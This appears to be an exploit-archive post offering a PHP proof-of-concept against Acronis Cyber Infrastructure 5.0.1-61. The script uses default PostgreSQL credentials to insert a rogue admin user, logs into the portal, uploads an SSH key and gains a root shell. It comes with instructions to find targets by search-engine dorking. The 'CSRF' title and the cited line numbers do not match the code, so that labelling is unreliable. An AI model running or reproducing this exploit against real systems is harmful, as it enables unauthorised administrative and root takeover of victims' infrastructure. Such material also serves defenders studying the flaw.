=============================================================================================================================================
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |
=============================================================================================================================================POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] add new admin.
[+] Line 83 + 100 +138 + 202 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class AcronisExploit {
private $sshSocket;
private $dbConn;
private $clusterId;
public function __construct() {
// Initialize default values
$this->sshSocket = null;
$this->dbConn = null;
$this->clusterId = null;
}
// Function to add an admin user to PostgreSQL DB
public function addAdminUser($username, $userid, $password) {
echo "Creating admin user $username with userid $userid\n";
// Insert new admin user into the user table
$resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");
if (!$resQuery) return false;
// Insert new admin user into the local_user table
$resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");
if (!$resQuery) return false;
$idLuser = pg_fetch_result($resQuery, 0, 0) + 1;
$resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");
if (!$resQuery) return false;
// Hash the password
$passwordHash = password_hash($password, PASSWORD_BCRYPT);
echo "Setting password $password with hash $passwordHash\n";
$today = date('Y-m-d');
$resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");
if (!$resQuery) return false;
// Assign admin roles
$idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");
$idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");
echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";
$this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");
echo "Successfully created admin user $username with password $password\n";
return true;
}
// Function to run a PostgreSQL query
private function postgresQuery($query) {
$result = pg_query($this->dbConn, $query);
if (!$result) {
echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";
return false;
}
return $result;
}
// Function to login to SSH
public function doSshLogin($ip, $user, $sshKey) {
$connection = ssh2_connect($ip, 22);
if (!$connection) {
echo "SSH connection failed\n";
return false;
}
if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {
$this->sshSocket = $connection;
return true;
} else {
echo "SSH authentication failed\n";
return false;
}
}
// Function to login to Acronis Cyber Infrastructure web portal
public function aciLogin($name, $pwd) {
$postData = json_encode([
'username' => $name,
'password' => $pwd
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"code":200') !== false);
}
// Function to get the cluster ID
public function getClusterId() {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
$data = json_decode($response, true);
if (isset($data['data'][0]['id'])) {
return $data['data'][0]['id'];
}
return null;
}
// Function to generate SSH keys
private function generateSshKeys() {
$privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');
$publicKey = $privateKey . '.pub';
ssh2_genkeypair($privateKey, $publicKey);
return [
'private' => $privateKey,
'public' => $publicKey
];
}
// Function to upload SSH public key
public function uploadSshKey($sshKey, $clusterId) {
$postData = json_encode([
'key' => $sshKey,
'event' => [
'name' => 'SshKeys',
'method' => 'post',
'data' => [
'key' => $sshKey
]
]
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"task_id"') !== false);
}
// Main exploit function
public function exploit($rhost, $dbPort, $sshPort, $username, $password) {
// Connect to PostgreSQL
$this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");
if (!$this->dbConn) {
echo "Could not connect to PostgreSQL database\n";
return false;
}
// Add a new admin user
$newUsername = substr(md5(rand()), 0, 8);
$newPassword = substr(md5(rand()), 0, 16);
$userId = bin2hex(random_bytes(16));
$this->addAdminUser($newUsername, $userId, $newPassword);
// Login to Acronis
if (!$this->aciLogin($newUsername, $newPassword)) {
echo "Failed to login to Acronis\n";
return false;
}
// Get cluster ID
$this->clusterId = $this->getClusterId();
if (!$this->clusterId) {
echo "Failed to get cluster ID\n";
return false;
}
// Generate SSH keys
$sshKey = $this->generateSshKeys();
// Upload SSH public key
if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {
echo "Failed to upload SSH public key\n";
return false;
}
// SSH Login
if (!$this->doSshLogin($rhost, 'root', $sshKey)) {
echo "SSH login failed\n";
return false;
}
echo "Exploit successful, SSH session established!\n";
return true;
}
}
// Example usage
$exploit = new AcronisExploit();
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================